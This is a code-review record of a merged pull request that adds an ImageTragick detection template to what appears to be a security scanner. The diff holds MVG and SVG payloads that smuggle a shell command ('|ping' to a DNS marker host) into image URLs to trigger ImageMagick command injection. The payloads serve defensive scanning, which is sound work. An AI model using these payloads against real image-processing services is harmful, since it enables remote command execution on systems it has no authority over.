### PR TITLE
Add more detects and payloads; fix syle

### PR DESCRIPTION
**Pull request by promix17**

### CODE REVIEW

File: image-tragic.yaml [hunk 1]
```diff
@@ -0,0 +1,33 @@
...
+      fill 'url(https://example.com/image.jpg"|ping -c 1 DNS_TOKEN")'
+      pop graphic-context
+    - !!str |
+      <?xml version="1.0" standalone="no"?>
+      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
+      "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
+      <svg width="640px" height="480px" version="1.1"
+      xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
+      "http://www.w3.org/1999/xlink";>
+      <image xlink:href="https://example.com/image.jpg&quot;|ping -c 2 DNS_TOKE&quot;"
```
[the remark this answers is not in the document]
Comment (promix17) [reply image-tragic.yaml]: Fixed

File: image-tragic.yaml [hunk 2]
```diff
@@ -0,0 +1,33 @@
+generate:
+  - into: 'file(_value){0,1}\z'
```
[the remark this answers is not in the document]
Comment (promix17) [reply image-tragic.yaml]: bo0om said that we could check olny .*file_value\z points

That was our logic, I just transfer it to dsl

[the remark this answers is not in the document]
Comment (d0znpp) [reply image-tragic.yaml]: It's OK

File: image-tragic.yaml (hunk 1 above)
[the remark this answers is not in the document]
Comment (d0znpp) [reply image-tragic.yaml]: Did you ever tested this detect?

[the remark this answers is not in the document]
Comment (d0znpp) [reply image-tragic.yaml]: @promix17

File: image-tragic.yaml (hunk 2 above)
[the remark this answers is not in the document]
Comment (promix17) [reply image-tragic.yaml]: Fixed

File: image-tragic.yaml (hunk 1 above)
[the remark this answers is not in the document]
Comment (promix17) [reply image-tragic.yaml]: Fix DNS_TOKEN to DNS_MARKER:
https://my.wallarm.com/vulnerabilities/237174
https://my.wallarm.com/vulnerabilities/237176

[the remark this answers is not in the document]
Comment (promix17) [reply image-tragic.yaml]: For example https://hub.docker.com/r/gordonchan/imagetragick-rails/

**Pull request merged**